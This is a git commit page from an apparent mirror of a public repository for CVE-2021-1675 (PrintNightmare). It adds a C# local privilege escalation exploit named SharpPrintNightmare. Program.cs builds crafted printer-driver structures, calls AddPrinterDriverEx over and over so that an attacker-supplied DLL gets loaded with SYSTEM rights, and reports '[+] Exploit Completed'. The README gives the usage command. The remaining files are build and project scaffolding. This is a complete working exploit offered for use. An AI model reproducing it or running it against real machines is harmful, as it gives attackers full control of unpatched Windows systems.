mirror of
https://github.com/cube0x0/CVE-2021-1675.git
synced 2024-12-22 02:36:33 +00:00
c# LPE version
Signed-off-by: cube0x0 <vidfelt@protonmail.com>
This commit is contained in:
parent
69a14897dd
commit
c047c45d75
21 changed files with 298 additions and 0 deletions
BIN
Images/poc2.png
Normal file
BIN
Images/poc2.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 196 KiB |
BIN
Images/poc3.png
Normal file
BIN
Images/poc3.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 35 KiB |
BIN
SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo
Normal file
BIN
SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo
Normal file
Binary file not shown.
9
SharpPrintNightmare/README.md
Normal file
9
SharpPrintNightmare/README.md
Normal file
|
@ -0,0 +1,9 @@
|
|||
# C# LPE Implementation of CVE-2021-1675
|
||||
|
||||
### Usage
|
||||
|
||||
```
|
||||
C:\SharpPrintNightmare.exe C:\addCube.dll
|
||||
```
|
||||
|
||||
![](../Images/poc3.png)
|
Binary file not shown.
6
SharpPrintNightmare/SharpPrintNightmare/App.config
Normal file
6
SharpPrintNightmare/SharpPrintNightmare/App.config
Normal file
|
@ -0,0 +1,6 @@
|
|||
<?xml version="1.0" encoding="utf-8" ?>
|
||||
<configuration>
|
||||
<startup>
|
||||
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
|
||||
</startup>
|
||||
</configuration>
|
150
SharpPrintNightmare/SharpPrintNightmare/Program.cs
Normal file
150
SharpPrintNightmare/SharpPrintNightmare/Program.cs
Normal file
|
@ -0,0 +1,150 @@
|
|||
using System;
|
||||
using System.ComponentModel;
|
||||
using System.IO;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
namespace SharpPrintNightmare
|
||||
{
|
||||
class Program
|
||||
{
|
||||
[DllImport("kernel32.dll")]
|
||||
static extern uint GetLastError();
|
||||
|
||||
[DllImport("winspool.drv", CharSet = CharSet.Auto, SetLastError = true)]
|
||||
public static extern bool AddPrinterDriverEx([Optional] string pName, uint Level, [In, Out] IntPtr pDriverInfo, uint dwFileCopyFlags);
|
||||
|
||||
//https://www.pinvoke.net/default.aspx/winspool/EnumPrinterDrivers.html
|
||||
[DllImport("winspool.drv", CharSet = CharSet.Auto, SetLastError = true)]
|
||||
static extern bool EnumPrinterDrivers(String pName, String pEnvironment, uint level, IntPtr pDriverInfo, uint cdBuf, ref uint pcbNeeded, ref uint pcRetruned);
|
||||
public struct DRIVER_INFO_2
|
||||
{
|
||||
public uint cVersion;
|
||||
[MarshalAs(UnmanagedType.LPTStr)]
|
||||
public string pName;
|
||||
[MarshalAs(UnmanagedType.LPTStr)]
|
||||
public string pEnvironment;
|
||||
[MarshalAs(UnmanagedType.LPTStr)]
|
||||
public string pDriverPath;
|
||||
[MarshalAs(UnmanagedType.LPTStr)]
|
||||
public string pDataFile;
|
||||
[MarshalAs(UnmanagedType.LPTStr)]
|
||||
public string pConfigFile;
|
||||
}
|
||||
|
||||
// 3.1.4.4.8 RpcAddPrinterDriverEx Values
|
||||
public static uint APD_STRICT_UPGRADE = 0x00000001;
|
||||
public static uint APD_STRICT_DOWNGRADE = 0x00000002;
|
||||
public static uint APD_COPY_ALL_FILES = 0x00000004;
|
||||
public static uint APD_COPY_NEW_FILES = 0x00000008;
|
||||
public static uint APD_COPY_FROM_DIRECTORY = 0x00000010;
|
||||
public static uint APD_DONT_COPY_FILES_TO_CLUSTER = 0x00001000;
|
||||
public static uint APD_COPY_TO_ALL_SPOOLERS = 0x00002000;
|
||||
public static uint APD_INSTALL_WARNED_DRIVER = 0x00008000;
|
||||
public static uint APD_RETURN_BLOCKING_STATUS_CODE = 0x00010000;
|
||||
|
||||
static void Main(string[] args)
|
||||
{
|
||||
string dllpath;
|
||||
if (args == null || args.Length == 0)
|
||||
{
|
||||
Console.WriteLine("Need an argument containing the dll path");
|
||||
Console.WriteLine(".\\SharpPrintNightmare.exe C:\\addCube.dll");
|
||||
Environment.Exit(0);
|
||||
}
|
||||
dllpath = args[0];
|
||||
|
||||
Console.WriteLine("[*] Try 1...");
|
||||
addPrinter(dllpath);
|
||||
Console.WriteLine("[*] Try 2...");
|
||||
addPrinter(dllpath);
|
||||
Console.WriteLine("[*] Try 3...");
|
||||
addPrinter(dllpath);
|
||||
}
|
||||
|
||||
static void addPrinter(string dllpath)
|
||||
{
|
||||
DRIVER_INFO_2[] drivers = getDrivers();
|
||||
string pDriverPath = Directory.GetParent(drivers[0].pDriverPath).FullName + "\\UNIDRV.DLL";
|
||||
Console.WriteLine("[*] pDriverPath Found " + pDriverPath);
|
||||
Console.WriteLine("[*] Executing C:\\addCube.dll");
|
||||
|
||||
//DRIVER_INFO_2 Level2 = drivers[0];
|
||||
DRIVER_INFO_2 Level2 = new DRIVER_INFO_2();
|
||||
Level2.cVersion = 3;
|
||||
Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
|
||||
Level2.pDataFile = dllpath;
|
||||
Level2.pDriverPath = pDriverPath;
|
||||
Level2.pEnvironment = "Windows x64";
|
||||
Level2.pName = "12345";
|
||||
|
||||
string filename = Path.GetFileName(dllpath);
|
||||
uint flags = APD_COPY_ALL_FILES | 0x10 | 0x8000;
|
||||
|
||||
//convert struct to unmanage code
|
||||
IntPtr pnt = Marshal.AllocHGlobal(Marshal.SizeOf(Level2));
|
||||
Marshal.StructureToPtr(Level2, pnt, false);
|
||||
|
||||
//call AddPrinterDriverEx
|
||||
AddPrinterDriverEx(null, 2, pnt, flags);
|
||||
Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error());
|
||||
Marshal.FreeHGlobal(pnt);
|
||||
|
||||
for (int i = 1; i <= 30; i++)
|
||||
{
|
||||
//add path to our exploit
|
||||
Level2.pConfigFile = $"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{i}\\{filename}";
|
||||
//convert struct to unmanage code
|
||||
IntPtr pnt2 = Marshal.AllocHGlobal(Marshal.SizeOf(Level2));
|
||||
Marshal.StructureToPtr(Level2, pnt2, false);
|
||||
|
||||
//call AddPrinterDriverEx
|
||||
AddPrinterDriverEx(null, 2, pnt2, flags);
|
||||
int errorcode = Marshal.GetLastWin32Error();
|
||||
Marshal.FreeHGlobal(pnt2);
|
||||
if(errorcode == 0)
|
||||
{
|
||||
Console.WriteLine($"[*] Stage {i}: " + errorcode);
|
||||
Console.WriteLine($"[+] Exploit Completed");
|
||||
Environment.Exit(0);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
static DRIVER_INFO_2[] getDrivers()
|
||||
{
|
||||
uint cbNeeded = 0;
|
||||
uint cReturned = 0;
|
||||
if (EnumPrinterDrivers(null, null, 2, IntPtr.Zero, 0, ref cbNeeded, ref cReturned))
|
||||
{
|
||||
//succeeds, but shouldn't, because buffer is zero (too small)!
|
||||
throw new Exception("EnumPrinters should fail!");
|
||||
}
|
||||
|
||||
int lastWin32Error = Marshal.GetLastWin32Error();
|
||||
//ERROR_INSUFFICIENT_BUFFER = 122 expected, if not -> Exception
|
||||
if (lastWin32Error != 122)
|
||||
{
|
||||
throw new Win32Exception(lastWin32Error);
|
||||
}
|
||||
|
||||
IntPtr pAddr = Marshal.AllocHGlobal((int)cbNeeded);
|
||||
if (EnumPrinterDrivers(null, null, 2, pAddr, cbNeeded, ref cbNeeded, ref cReturned))
|
||||
{
|
||||
DRIVER_INFO_2[] printerInfo2 = new DRIVER_INFO_2[cReturned];
|
||||
long offset;
|
||||
offset = pAddr.ToInt64();
|
||||
Type type = typeof(DRIVER_INFO_2);
|
||||
int increment = Marshal.SizeOf(type);
|
||||
for (int i = 0; i < cReturned; i++)
|
||||
{
|
||||
printerInfo2[i] = (DRIVER_INFO_2)Marshal.PtrToStructure(new IntPtr(offset), type);
|
||||
offset += increment;
|
||||
}
|
||||
Marshal.FreeHGlobal(pAddr);
|
||||
return printerInfo2;
|
||||
}
|
||||
|
||||
throw new Win32Exception(Marshal.GetLastWin32Error());
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,35 @@
|
|||
using System.Reflection;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
// General Information about an assembly is controlled through the following
|
||||
// set of attributes. Change these attribute values to modify the information
|
||||
// associated with an assembly.
|
||||
[assembly: AssemblyTitle("SharpPrintNightmare")]
|
||||
[assembly: AssemblyDescription("Cube0x0")]
|
||||
[assembly: AssemblyConfiguration("Cube0x0")]
|
||||
[assembly: AssemblyCompany("Cube0x0")]
|
||||
[assembly: AssemblyProduct("SharpPrintNightmare")]
|
||||
[assembly: AssemblyCopyright("Copyright © 2021")]
|
||||
[assembly: AssemblyTrademark("Cube0x0")]
|
||||
[assembly: AssemblyCulture("")]
|
||||
|
||||
// Setting ComVisible to false makes the types in this assembly not visible
|
||||
// to COM components. If you need to access a type in this assembly from
|
||||
// COM, set the ComVisible attribute to true on that type.
|
||||
[assembly: ComVisible(false)]
|
||||
|
||||
// The following GUID is for the ID of the typelib if this project is exposed to COM
|
||||
[assembly: Guid("5feb114b-49ec-4652-b29e-8cb5e752ec3e")]
|
||||
|
||||
// Version information for an assembly consists of the following four values:
|
||||
//
|
||||
// Major Version
|
||||
// Minor Version
|
||||
// Build Number
|
||||
// Revision
|
||||
//
|
||||
// You can specify all the values or you can default the Build and Revision Numbers
|
||||
// by using the '*' as shown below:
|
||||
// [assembly: AssemblyVersion("1.0.*")]
|
||||
[assembly: AssemblyVersion("1.0.0.0")]
|
||||
[assembly: AssemblyFileVersion("1.0.0.0")]
|
|
@ -0,0 +1,52 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
|
||||
<PropertyGroup>
|
||||
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
|
||||
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
|
||||
<ProjectGuid>{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}</ProjectGuid>
|
||||
<OutputType>Exe</OutputType>
|
||||
<RootNamespace>CVE_2021_1675</RootNamespace>
|
||||
<AssemblyName>SharpPrintNightmare</AssemblyName>
|
||||
<TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
|
||||
<FileAlignment>512</FileAlignment>
|
||||
<Deterministic>true</Deterministic>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
|
||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
||||
<DebugSymbols>true</DebugSymbols>
|
||||
<DebugType>full</DebugType>
|
||||
<Optimize>false</Optimize>
|
||||
<OutputPath>bin\Debug\</OutputPath>
|
||||
<DefineConstants>DEBUG;TRACE</DefineConstants>
|
||||
<ErrorReport>prompt</ErrorReport>
|
||||
<WarningLevel>4</WarningLevel>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
|
||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
||||
<DebugType>pdbonly</DebugType>
|
||||
<Optimize>true</Optimize>
|
||||
<OutputPath>bin\Release\</OutputPath>
|
||||
<DefineConstants>TRACE</DefineConstants>
|
||||
<ErrorReport>prompt</ErrorReport>
|
||||
<WarningLevel>4</WarningLevel>
|
||||
</PropertyGroup>
|
||||
<ItemGroup>
|
||||
<Reference Include="System" />
|
||||
<Reference Include="System.Core" />
|
||||
<Reference Include="System.Xml.Linq" />
|
||||
<Reference Include="System.Data.DataSetExtensions" />
|
||||
<Reference Include="Microsoft.CSharp" />
|
||||
<Reference Include="System.Data" />
|
||||
<Reference Include="System.Net.Http" />
|
||||
<Reference Include="System.Xml" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Compile Include="Program.cs" />
|
||||
<Compile Include="Properties\AssemblyInfo.cs" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<None Include="App.config" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
|
||||
</Project>
|
|
@ -0,0 +1,25 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Version 16
|
||||
VisualStudioVersion = 16.0.31205.134
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpPrintNightmare", "SharpPrintNightmare.csproj", "{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|Any CPU = Debug|Any CPU
|
||||
Release|Any CPU = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
||||
{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
||||
{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
||||
{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}.Release|Any CPU.Build.0 = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {11E1DC60-0FB5-4AF6-86EF-EDB693E64849}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
Binary file not shown.
|
@ -0,0 +1,6 @@
|
|||
<?xml version="1.0" encoding="utf-8" ?>
|
||||
<configuration>
|
||||
<startup>
|
||||
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
|
||||
</startup>
|
||||
</configuration>
|
Binary file not shown.
|
@ -0,0 +1,4 @@
|
|||
// <autogenerated />
|
||||
using System;
|
||||
using System.Reflection;
|
||||
[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
|
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,4 @@
|
|||
// <autogenerated />
|
||||
using System;
|
||||
using System.Reflection;
|
||||
[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
|
|
@ -0,0 +1 @@
|
|||
6a7ab24d74b7e25a7ffff290d4fe2dc8916038a2
|
|
@ -0,0 +1,6 @@
|
|||
C:\CVE-2021-1675\SharpPrintNightmare\SharpPrintNightmare\bin\Release\SharpPrintNightmare.exe.config
|
||||
C:\CVE-2021-1675\SharpPrintNightmare\SharpPrintNightmare\bin\Release\SharpPrintNightmare.exe
|
||||
C:\CVE-2021-1675\SharpPrintNightmare\SharpPrintNightmare\bin\Release\SharpPrintNightmare.pdb
|
||||
C:\CVE-2021-1675\SharpPrintNightmare\SharpPrintNightmare\obj\Release\SharpPrintNightmare.csproj.CoreCompileInputs.cache
|
||||
C:\CVE-2021-1675\SharpPrintNightmare\SharpPrintNightmare\obj\Release\SharpPrintNightmare.exe
|
||||
C:\CVE-2021-1675\SharpPrintNightmare\SharpPrintNightmare\obj\Release\SharpPrintNightmare.pdb
|
Binary file not shown.
Binary file not shown.
Loading…
Reference in a new issue